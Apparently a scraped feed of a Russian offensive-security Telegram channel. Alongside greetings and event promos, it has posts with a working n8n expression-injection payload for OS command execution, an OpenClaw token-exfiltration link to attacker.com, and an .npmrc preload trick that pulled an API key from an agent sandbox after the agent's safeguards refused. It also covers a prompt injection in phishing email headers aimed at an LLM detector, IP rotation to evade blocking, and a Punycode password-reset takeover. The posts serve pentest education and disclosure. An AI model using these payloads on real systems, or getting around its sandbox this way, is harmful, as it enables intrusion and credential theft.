PurpleBear (@purple_medved)

PurpleBear

@purple_medved

09.05.2026 17:23

С Днём Победы!

Этот день навсегда останется символом мужества, стойкости и героизма нашего народа.

Мы чтим каждого героя, кто отстоял мир и свободу, подарив нам возможность жить и развиваться!

🔥 28

🤮 20

👏 11

🎉 6

👎 5

🤡 4

👍 2

🙏 1

1 1 945

PurpleBear

Переслано от канала

08.04.2026 19:35

Защита ДБО: как банки противостоят целевым атакам в 2026 году | Цифровизация банков

Дистанционное банковское обслуживание — лакомая цель для злоумышленников. Атаки становятся точнее, умнее и всё сложнее отличимы от действий легитимного пользователя. Как банки отвечают на этот вызов?

В этом выпуске совместного подкаста Global Digital Space и Национального банковского журнала «Цифровизация банков» разбираемся, как устроена защита ДБО в 2026 году.

Говорим о том, что происходит прямо сейчас:
какие атаки на ДБО наиболее опасны сегодня и как изменился их профиль;
где граница ответственности между антифродом, WAF и API security;
как ИИ и дипфейки меняют арсенал злоумышленников;
насколько оправданы бюджеты на соответствие требованиям регуляторов;
зрелость российских решений: где ещё есть пробелы;
как улучшить клиентский путь, не жертвуя безопасностью.

Ведущий: Вадим Шелест, Wildberries & Russ

Эксперты:
Ирина Чурикова, SafeTech
Павел Луцик, КриптоПро
Владимир Гриднев, WMX (Вебмониторэкс)
Олег Волков, банк Кубань Кредит
Дмитрий Никишов, банк ДОМ.РФ

Смотрите тут

VK Видео YouTube
RUTUBE Дзен

#GDS #NBJ #подкаст

🔥 14

🤡 3

👎 1

4 13 2K

PurpleBear

@purple_medved

13.03.2026 12:13

Hacked Perplexity Computer and got unlimited Claude Code 🤖

Сегодня хочу рассказать про интересное исследование Perplexity Computer - отличный пример того, где ломается agent‑инфраструктура.

Исследователь изучал sandboxing multi‑agent системы и обнаружил внутри sandbox установленный Claude Code (Node.js, bypass‑permissions mode) Поэтому возник вполне логичный вопрос - где хранится Anthropic API key и как он изолирован?

6 попыток вытащить ключ провалились - модель и prompt‑safety реально отработали хорошо:
🔴 dump process.env - отказ
🔴 троян на shared FS - агент понял подвох
🔴.bashrc / PATH hijack —-не сработало
🔴 system prompt - не найден

А потом классика supply‑chain атак 😎
Claude Code - это Node.js → запускается через npm → npm читает ~/.npmrc → home‑директория доступна на shared filesystem.

Через .npmrc можно задать:
node-options=--require /path/to/preload.js
--require подгружает JS до старта приложения и до любых safety‑проверок.

💣 Эксплоит = 3 команды:
1️⃣ preload‑скрипт, который пишет process.env в файл
2️⃣ запись .npmrc
3️⃣ любая задача

Результат - доступ к Perplexity proxy‑token к Anthropic API.
И самое интересное:
🔴 токен не IP‑restricted
🔴 не sandbox‑bound
🔴 не ephemeral
🔴 биллинг на Perplexity

100k+ токенов × несколько запусков → деньги не списываются.
Фактически unlimited Claude Code за их счёт 💸
Модель всё сделала правильно - сломалась именно архитектура.

Если вы строите agent‑infra, стоит подумать про:
🔐 токен должен быть привязан к sandbox
⏳ токен должен быть короткоживущим
💳 usage должен биллиться на пользователя
Иначе proxy - это просто лишний network hop, который ничего не защищает.

Большинство multi‑agent продуктов сегодня устроены примерно так же 😎

X (formerly Twitter)

Yousif Astarabadi (@yousifa) on X

I hacked Perplexity Computer and got unlimited Claude Code

🔥 19

5 80 3.5K

PurpleBear

@purple_medved

04.02.2026 13:42

One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)

Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.

🤦 Основная проблема:
1️⃣ Ручка /api/export-auth доступна без аутентификации
2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)

⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр gatewayUrl из query‑string
2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего

💫 Сценарий:
1️⃣ Жертва кликает ссылку:
https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil
2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте

📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control

✅ Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣ ~~Использовать естественный интеллект~~
4️⃣ Не публиковать AI‑агентов в интернет

hunt.io

Hunting OpenClaw Exposures: CVE-2026-25253 in Internet-Facing AI Agent Gateways

Our research team identified over 17,500 internet-exposed OpenClaw, Clawdbot, and Moltbot instances vulnerable to CVE-2026-25253. This report documents detection methods and infrastructure analysis using Hunt.io

🔥 4

9 34 3.2K

PurpleBear

Переслано от AM Live

23.01.2026 14:19

Почему API — главная дыра в защите веб-приложений

Даже когда настроены WAF, анти-DDoS и антибот — атаки не прекращаются. Всё чаще защита ломается именно на API: здесь обходят авторизацию, валидаторы и получают доступ к бизнес-логике.

28 января в 11:00 в прямом эфире AM Live покажем, почему API — слабое звено даже в хорошо защищённых веб-приложениях и что с этим делать.

Что вы узнаете:
— Какие уязвимости чаще всего дают атакам зелёный свет
— Как разделить зону ответственности между шлюзами, логикой и разработкой
— Как защитить API, чтобы не стать «точкой входа»

Регистрируйтесь на эфир по ссылке

🔥 5

👍 2

🤮 2

🤡 1

28 2.5K

PurpleBear

@purple_medved

12.01.2026 14:17

n8n Expression Injection → RCE (CVE‑2025‑68613)

В конце прошлого года были опубликованы технические детали эксплуатации критической уязвимости CVE‑2025‑68613 с оценкой CVSSv3 = 9.9 в популярной open‑source платформе автоматизации n8n
n8n - workflow‑движок на Node.js, широко используемый для автоматизации LLM интеграций. У меня n8n используется для домашней автоматизации в качестве альтернативы Node-Red для Home Assistant, но также достаточно часто разворачивается внутри корпоративных сетей, что делает последствия эксплуатации довольно критичными.

В n8n используется механизм expressions - любые значения в формате {{ ... }} интерпретируются как JavaScript и обрабатываются на стороне сервера как есть🤷

Проблема в том, что:
🔴 expression evaluator не имеет строгой sandbox‑изоляции;
🔴 возможен доступ к prototype chain;
🔴 выражения исполняются через небезопасные конструкции уровня Function().
В результате expression injection позволяет выйти из песочницы и получить доступ к runtime Node.js

POC демонстрирующий побег из sandbox:

{{ this.constructor.constructor("return process")() }}



this.constructor → Function

Function.constructor → снова Function

создаётся новая функция, возвращающая process

Дальше всё предсказуемо - получаем child_process и выполняем команды ОС:

{{

  this.constructor

    .constructor(

      "return process.mainModule.require('child_process')" +

      ".execSync('id').toString()"

    )()

}}

Таким образом имея непривилегированную учётку n8n, атакующий может:
✔️ прокинуть себе reverse shell
✔️ украсть токены, секреты и креды из workflow
✔️ модифицировать или подменить бизнес‑логику автоматизации

⚙️ POC: https://github.com/TheStingR/CVE-2025-68613-POC
🔎 Nuclei: https://github.com/rxerium/CVE-2025-68613/blob/main/CVE-2025-68613.yaml
🪲 Уязвимые версии ПО: 0.211.0 – 1.120.3
✅ Рекомендации: Обновиться до версии 1.120.4 / 1.121.1 / 1.122.0

GitHub

GitHub - rxerium/CVE-2025-68613: Detection for CVE-2025-68613

Detection for CVE-2025-68613. Contribute to rxerium/CVE-2025-68613 development by creating an account on GitHub.

👍 5

41 3.1K

PurpleBear

@purple_medved

31.12.2025 14:17

Поздравляю с наступающим Новым годом! 🥳

Пусть в новом году будет больше спокойствия, уверенности и радости от жизни - не только от работы, но и от простых моментов рядом с близкими.

Желаю крепкого здоровья вам и вашим семьям, внутреннего баланса, сил и энергии идти вперёд.
Пусть будет время на себя, на отдых, на мечты и на то, что действительно важно!

Пусть 2026 год станет годом больших достижений, правильных решений и уверенности в завтрашнем дне.
Живите так, как хочется, цените себя и людей рядом и не забывайте радоваться мелочам.

Отдельное спасибо каждому из вас - за интерес, доверие, обратную связь и участие в развитии канала. Благодаря вам хочется продолжать и делать его лучше.

С наступающим Новым годом! 🎉
До встречи в 2026❤️

🎉 20

🔥 9

🥰 1

4 4 2.6K

PurpleBear

@purple_medved

01.12.2025 13:28

Всем привет!
Запись прямого эфира AM Live на тему «Стратегия информационной безопасности: от разработки до применения» доступна по ссылке: https://www.youtube.com/watch?v=ymcaRTqbR-0
Эфир для тех, кто не хочет узнавать о провале стратегии после атаки из новостей.

❓ Ваша стратегия ИБ — работает? Или это просто файл в папке?
❓ У вас есть метрики зрелости? Критерии эффективности? Проверки в реальных условиях?

Мы с коллегами обсудили:
✅ Как понять, что стратегия ИБ не работает
✅ Что эффективнее: KPI по инцидентам или уровню зрелости
✅ Как проверять устойчивость стратегии с помощью регулярных пентестов и кибериспытаний
✅ Как визуализировать стратегию для совета директоров, чтобы вас услышали

Эфир получился жарким, наполненным интересными дискуссиями между представителями внешнего консалтинга и CISO крупных компаний.

Приятного просмотра! Буду очень признателен за лайки, репосты и комментарии 🙏

YouTube

Стратегия информационной безопасности: от разработки до применения

🔥 7

🥰 2

😎 2

1 20 3.2K

PurpleBear

@purple_medved

27.11.2025 20:15

Поздравляю победителей🎉
В ближайщее свяжусь со всеми в ЛС✍️

👏 5

1 2.8K

PurpleBear

@purple_medved

27.11.2025 15:37

PurpleBear Видео: ASSUME BIRCH MEETUP #5 Декабрь - это не только горящие дедлайны и подведение итогов года. Это еще и идеальное время, чтобы выдохнуть и встретиться с коллегами "по цеху" 🍻 на митапе для специалистов в области атакующей информационной безопасности ASSUME BIRCH #5 Что в программе: 📍 Уютный московский бар и расслабленная обстановка 🗣 Крутые доклады от топовых экспертов индустрии 🍔 Закуски, напитки и возможность выиграть крутой мерч 🤝 Нетворкинг и отличное настроение 📆 04 декабря, 18:30 📍Москва, точная локация будет указана в персональном приглашении Мероприятие традиционно приватное, записей не будет, вход только по персональным приглашениям. Но есть 3 проходки, которые мы разыграем. Условия простые, необходимо просто заломать мосад подписаться на каналы @assume_birch и @purple_medved и нажать кнопку Участвовать, а победителей определит бездушный рандом 27.11 в 13:37 Единственная просьба - вписываться, только если уверены что 100% получится прийти🙏

Результаты розыгрыша:

Победители:
1. S3 (@s3n_q)
2. Anton (@st1zz999)
3. Over (@elviacro)

Проверить результаты

👍 4

😁 2

🤮 1

6 3 2.7K

PurpleBear

@purple_medved

25.11.2025 18:30

ASSUME BIRCH MEETUP #5

Декабрь - это не только горящие дедлайны и подведение итогов года. Это еще и идеальное время, чтобы выдохнуть и встретиться с коллегами "по цеху" 🍻 на митапе для специалистов в области атакующей информационной безопасности ASSUME BIRCH #5

Что в программе:
📍 Уютный московский бар и расслабленная обстановка
🗣 Крутые доклады от топовых экспертов индустрии
🍔 Закуски, напитки и возможность выиграть крутой мерч
🤝 Нетворкинг и отличное настроение

📆 04 декабря, 18:30
📍Москва, точная локация будет указана в персональном приглашении

Мероприятие традиционно приватное, записей не будет, вход только по персональным приглашениям.

Но есть 3 проходки, которые мы разыграем. Условия простые, необходимо просто ~~заломать мосад~~ подписаться на каналы @assume_birch и @purple_medved и нажать кнопку Участвовать, а победителей определит бездушный рандом 27.11 в 13:37 Единственная просьба - вписываться, только если уверены что 100% получится прийти🙏

🔥 4

19 2.8K

PurpleBear

@purple_medved

25.11.2025 13:30

JA4D and JA4D6: DHCP Fingerprinting

Всем привет! Давно я ничего не писал, потому что, как буквально вчера сказал один мой хороший друг ..."Q4, выживаем как можем"... поэтому сразу лайк, этому посту, у кого тоже самое😜

Пару лет назад я писал про фреймворк JA4+ Network Fingerprinting для снятия отпечатков с трафика, который активно используется различными СЗИ для идентификации вредоносной активности на уровне сети. А на прошлой неделе вышли дополнения JA4D и JA4D6 позволяющие определять активы в момент подключения к сети на основе запросов DHCP/DHCPv6. Суть метода заключается в сравнение фингерпринтов при подключении для основных запросов DHCP/DHCPv6 с библиотекой известных устройств. На данный момент библиотека отпечатков для этого дополнения пока небольшая, но учитывая большую популярность фреймворка у различных вендоров она 100% быстро разрастется.

Таким образом, можно очень быстро идентифицировать любые недоверенные устройства/ОС в вашей корпоративной сети, без активного сканирования. При этом методов байпаса для JA4+ фактически не существует, поэтому любая пентестерская kali lincox😂 будет моментально светиться в логах СЗИ 👍

foxio.io

JA4D and JA4D6: DHCP Fingerprinting - Fox IO_01

We solve the world’s toughest cyber challenges—creating breakthrough technology and embedding it into the systems that run everything.

🔥 14

👍 5

55 2.8K

PurpleBear

@purple_medved

25.11.2025 13:30

13 2.4K

PurpleBear

@purple_medved

20.10.2025 12:30

Всем привет!
Запись прямого эфира на тему «Offensive Security: как превратить пентесты и Red Team в стратегию» доступна на каналах AM Live.

Традиционная безопасность отвечает на атаки. Offensive Security — предупреждает их.
Если вы всё ещё «закрываете периметр» и «повышаете осведомлённость сотрудников» — возможно, вы просто играете в оборону.

Мы с коллегами говорили о компаниях, которые пошли дальше: регулярно проводят Red Teaming силами внешних подрядчиков или строят собственные внутренние команды, запускают Bug Bounty и превращают пентесты из формальности в системную практику.

✅ YouTube
✅ VK Видео
✅ RuTube

Приятного просмотра!

PS: Буду очень признателен за лайки, комментарии и конструктивную критику🙏

YouTube

Offensive Security: как превратить пентесты и Red Team в стратегию

Наступательная кибербезопасность становится неотъемлемой частью зрелой ИБ-практики. Пентесты, Red Team, Bug Bounty — это не просто «проверки на уязвимости», а способ увидеть свою защиту глазами атакующего. В эфире AM Live обсуждали: — Какие offensive-практики работают в реальных условиях — Как не ошибиться с выбором подрядчика и не потерять бюджет — Где offensive security показывает наибольший ROI — Почему важно говорить о бизнес-рисках, а не просто об уязвимостях — Как offensive меняет культуру безопасности в компании Полезно тем, кто отвечает за ИБ, оценивает зрелость процессов, планирует пентесты и хочет использовать наступательные практики с максимальной пользой. Модератор: Вадим Шелест, Руководитель направления анализа защищенности, Wildberries & Russ Участники: 1) Вячеслав Васин, Руководитель центра компетенции по анализу защищенности, «Лаборатория Касперского» 2) Михаил Сидорук, руководитель управления анализа защищенности, BI.ZONE 3) Василий Кравец, начальник отдела исследований информационных технологий, «Перспективный мониторинг» 4) Анатолий Песковский, руководитель направления анализа защищенности IZ:SOC компании «Информзащита» 5) Иван Булавин, директор по продуктам платформы Standoff 365, Positive Technologies 6) Дмитрий Зубарев, заместитель директора аналитического центра, УЦСБ 7) Глеб Чербов, технический директор DSEC by Solar 8) Евгений Янов, руководитель департамента аудита и консалтинга, F6 Тайм-коды: 00:00:00 Введение 00:06:32 Структура Offensive Security 00:08:20 Анализ защищённости и пентесты 00:10:03 Моделирование атак и реальный бой 00:14:25 Экономическая целесообразность 00:16:02 Плюсы и минусы внешних подрядчиков 00:17:01 Плюсы и минусы внутренних команд 00:20:15 Зависимость от масштаба компании 00:21:15 Законодательство и регуляторы 00:22:14 Задачи внутренних команд 00:24:06 Зрелость процессов информационной безопасности 00:25:30 Проблемы работы с отчётами при низкой зрелости 00:26:15 Роль провайдера в доведении результатов 00:27:07 Различие между продуктовой и информационной безопасностью 00:28:06 Ошибки при организации центра информационной безопасности 00:30:04 Выбор внешнего подрядчика 00:34:26 Критерии выбора топовых компаний 00:36:07 Ошибки заказчиков при выборе подрядчиков 00:39:14 Проблемы с требованиями 00:40:28 Терминология в информационной безопасности 00:42:57 Уровень зрелости компании 00:46:26 Целеполагание и ожидания 00:49:10 Начало общения с клиентом 00:49:46 Работа с заказчиками 00:50:51 Формулирование технического задания 00:53:28 Сроки и планирование 01:00:20 Вовлечение сторон в проект 01:02:59 Роль технического задания 01:05:13 Взаимодействие бизнеса, ИT и ИБ 01:06:30 Подготовка к проекту 01:09:13 Подготовка заказчика к проекту 01:11:33 Эффективность пентеста 01:12:16 Подготовка к пентесту 01:13:10 Перепроверки после пентеста 01:14:02 Консистентность инфраструктуры 01:15:21 Ошибки при закрытии уязвимостей 01:16:59 Отношение руководства к результатам 01:19:09 Согласованность действий 01:20:23 Объяснение уязвимостей бизнесу 01:23:06 Оценка защищённости 01:24:28 Донесение информации в отчётах 01:25:52 Оценка рисков 01:28:07 Примеры объяснения уязвимостей 01:30:44 Инвестиции или расходы 01:34:53 Условия для признания инвестиций 01:35:57 Инвестиции в информационную безопасность 01:36:49 Требования регуляторов и практика 01:37:42 Проекты с киберспытаниями 01:38:21 Проверки регулирующих органов 01:44:49 Проверка защищённости приложений 01:46:03 Взаимодействие с подрядчиками 01:47:20 Распределение расходов на тестирование 01:48:39 Особенности работы с малым и средним бизнесом 01:49:21 Стоимость услуг для малого и среднего бизнеса 01:50:14 Роль провайдеров в сканировании уязвимостей 01:50:56 Необходимость пентестов для малого и среднего бизнеса 01:51:54 Стратегии защиты программного обеспечения 01:53:40 Практические кейсы предотвращения инцидентов 01:56:39 Пример из практики холдинга 01:57:34 Необычный кейс с подозрительной тактикой 01:58:56 Обнаружение компрометации 02:00:55 Роль сотрудников в безопасности 02:03:27 Мотивация сотрудников 02:04:56 Ответственность и мотивация…

🔥 7

👏 1

2 30 3.3K

PurpleBear

Переслано от AM Live

13.10.2025 12:53

Традиционная безопасность отвечает на атаки. Offensive Security — предупреждает их.

Если вы всё ещё «закрываете периметр» и «повышаете осведомлённость сотрудников» — возможно, вы просто играете в оборону.

В прямом эфире мы поговорим о компаниях, которые пошли дальше: строят Red Team, запускают Bug Bounty и превращают пентесты из формальности в системную практику.

В фокусе разговора:

Где offensive security действительно помогает — а где не работает

Кто в компании должен быть заказчиком: ИБ, ИТ или бизнес?

Как не скатиться в checkbox и превратить результаты атаки в реальные улучшения

Почему именно offensive-специалисты помогают строить зрелую культуру ИБ

И главное: как объяснить топ-менеджменту, что фишинг — не вина сотрудника, а системный сигнал

Эфир уже 15 октября в 11:00 (МСК)

Регистрируйтесь по ссылке

🔥 7

👏 3

1 15 2.8K

PurpleBear

@purple_medved

08.10.2025 15:06

Всем привет!
Очень часто во время пентестов внешнего периметра возникает ситуация, когда различные СЗИ блокируют адреса атакующей инфраструктуры в автоматизированном режиме, что немного затрудняет процесс сканирования открытых портов и фазинга директорий и файлов. Концептуальное решение для обхода, такое же очевидное как и сам принцип блокировок, использовать "карусель проксей", чтобы каждый запрос летел с нового source ip😎

Уже давно существуют утилиты с открытым исходным кодом, которые решают эту задачу, например FireProx для использования пула адресов Amazon через AWS API Gateway, к тому же абсолютно не сложно написать свое кастомное решение😜 Мы в своей практике для этих целей используем Yandex API Gateway, Yandex Cloud Functions и резидентские прокси + немного python в случаях с особо трепетными СЗИ, которые по дефолту блокируют пулы адресов публичных облачных провайдеров.

После длинного предисловия, хочу поделиться новым инструментом - FlareProx, для решения этой задачи с использованием пула ip адресов Cloudflare Workers.

✅ Утилита на python3, поддерживает все HTTP методы (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)
✅ Огромный пул адресов Cloudflare
✅ Лимит запросов - 100k/ежедневно на бесплатном уровне подписки Cloudflare

Таким образом, у нас в арсенале появился еще один инструмент для обхода блокировок по source ip, который точно не будет лишним на проектах в формате тестирований на проникновение внешнего периметра.

GitHub

GitHub - ustayready/fireprox: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation

AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation - ustayready/fireprox

🔥 20

👍 10

👎 1

🥰 1

145 4K

PurpleBear

@purple_medved

03.10.2025 15:26

Penetration Tester в Red Team Wildberries & Russ
ЗП: до 500 тыс рублей net
Уровень: Middle/Senior
Формат: офис или удаленка или гибрид

Мы в поиске новых тиммейтов в APT Wildbears💜

💫 Чем предстоит заниматься:
• Проведение аудитов в формате тестирования на проникновение (внешняя и внутренняя инфраструктура, социалка)
• Проведение аудитов в формате анализа защищенности (веб и мобильные приложения)
• Проведение аудитов в формате Red/Purple Teaming
• Поиск и эксплуатация уязвимостей веб и мобильных приложений
• Поиск и эксплуатация уязвимостей и недостатков конфигурации ОС Linux а также специфичных для нее сервисов
• Поиск и эксплуатация уязвимостей OC Windows и недостатков конфигурации Active Directory
• Поиск и эксплуатация уязвимостей и недостатков конфигурации СУБД, систем виртуализации и контейнеризации
• Оформление найденных уязвимостей для отчетов по итогам проектов

❤️ Что для этого нужно:
• Опыт проведения проектов по анализу защищенности веб и мобильных приложений
• Опыт проведения проектов по тестированию на проникновение (внешняя и внутренняя инфраструктура)
• Опыт поиска и эксплуатации уязвимостей веб и мобильных приложений
• Опыт поиска и эксплуатации уязвимостей ОС Linux
• Опыт поиска и эксплуатации уязвимостей OC Windows и недостатков конфигурации AD
• Опыт поиска и эксплуатации уязвимостей и недостатков конфигурации систем виртуализации и контейнеризации
• Знание любого языка программирования на уровне достаточном для понимания/создания эксплойтов и автоматизации задач по поиску уязвимостей

🤪 Будет плюсом:
• Образование (бакалавр, магистр) в одном из технических вузов РФ (МИФИ, МГТУ им. Баумана, МГУ)
• Наличие профильных сертификатов (OSCP, OSWE, OSEP, CRTO)
• Выступления на крупных конференциях и митапах, например PHDays, OffZone, Standoff и других
• Участие в CTF и Bug Bounty

🔥 Что мы предлагаем:
• Полная удаленка или гибрид с офисами в Москве и Санкт-Петербурге
• IT-ипотека и оформление в аккредитованную IT-компанию
• Бесплатное питание в офисах, ДМС со стоматологией (после испытательного срока)
• Корпоративное обучение и IT-мероприятия

Контакты: @virecruiter 👀 или можно ко мне в ЛС

🔥 20

😁 4

👎 1

131 3.6K

PurpleBear

@purple_medved

03.10.2025 15:26

2 2.3K

PurpleBear

@purple_medved

18.09.2025 13:47

Account Takeover by Unicode/Punycode email password reset

Уже довольно давно у меня в бэклоге лежала интересная техника, найденная где-то на просторах сети, которой я хочу сегодня поделиться.

Punycode / IDN Homograph традиционно используется в проведении фишинговых компаний для получения первоначального доступа во время Red Team и пентестов, но можно также использовать эту технику для тестирования механизмов восстановления пароля/байпаса 2FA через email в рамках багбаунти😎

Сначала немного теории:
IDN (Internationalized Domain Name) - это технология, позволяющая использовать в доменных именах символы из национальных алфавитов: кириллицы, китайских иероглифов, арабской письменности и пр.
Так как изначально в системе доменных имён были предусмотрены только латинские буквы A-Z, цифры 0-9 и дефис, придумали специальную кодировку - Punycode/Unicode, как способ закодировать домен с не-ASCII символами в ASCII-совместимую форму. Например: домен.рф → xn--d1acufc.xn--p1ai

♦️Тестирование механизмов восстановления пароля/байпаса 2FA через почту по умолчанию в методологии любого пентестера и багхантера, поэтому берём валидный email victim@gmail.com и меняем домен на Unicode-вариант victim@gmáil.com
♦️Добавляем Collaborator victim@gmáil.com.<collab>.burpcollaborator.net, перехватываем запрос → подменяем email жертвы и отправляем дальше.
♦️ Наблюдаем результат → в Collaborator проверяем SMTP отстуки. Если приходит письмо для сброса пароля / 2FA - значит система некорректно обработала Unicode.
♦️Репортим багу как Account Takeover для victim@gmail.com
💸 Вы великолепны!

Почему так работает для фишинга абсолютно понятно, латинская a vs кириллическая а визуально практически неотличимы, а вот как можно допустить такую ошибку в механизме восстановления пароля для меня загадка😜 Но тем не менее уже есть кейсы когда багхантеры лутали за эту багу 10k$ в публичных программах.

🔥 10

👍 6

5 67 3.5K

PurpleBear

@purple_medved

02.09.2025 13:58

Phishing Emails Are Now Aimed at Users and AI Defenses

Недавно мне на глаза попалась статья с разбором фишинговой компании с интересной особенностью, которой хочу поделиться в этой короткой заметке. На первый взгляд ничего интересного, классический сценарий - фишинг пользователя Gmail с целью получения учетных данных под предлогом необходимости смены "проссроченного" пароля. Рассылка проводилась с SendGrid, фишинговая страница с обфусцированным js за редиректором на доверенном сабдоменом Microsoft Dynamics и прикрыта капчей.

Но в MIME заголовке сообщения электронной почты есть текст промта, адресованный LLM модели (на скриншоте) подключенной к песочнице email gateway почтового сервера, для обнаружения фишинга📥 Такой AI prompt-injection позволяет отправить модель в длинную петлю рассуждений, намеренно затягивая время получения алерта и автоматизированной блокировки отправителя😜

Вообще, хайп связанный с LLM, которые притаскивают в различные продукты и решения не планирует утихать, например, для меня загадка зачем кошачьему туалету нужен искусственный интелект🤦 (см второй скриншот, особенно на самого кота😂)
В нашей отрасли эти дополнения обычной функциональности обычно подаются в качестве "волшебной серебрянной пули", которая способна решить все задачи естественного интелекта. И это вполне закономерный этап эволюции технологий, прогресс в отрасли AI позволит вывести автоматизацию рутины на новый уровень, позволит нам решать творческие задачи, делегируя все остальное бездушной машине, но принимать окончательные решения должен все таки естественный интелект.

Возвращаясь к фишингу, дополнительные технические уровни контроля на базе LLM это очень круто, но это не заменит критическое мышление, сформированное классическим подходом повышения осведомленности пользователей😎

Malware Analysis, Phishing, and Email Scams

Phishing Emails Are Now Aimed at Users and AI Defenses

Phishing has always been about deceiving people. But in this campaign, I discovered something new. The attackers weren’t only targeting users, they also attempted to manipulate AI-based defences. T…

🔥 8

👍 4

2 24 2.9K

Вход в экосистему

Ваши настройки cookie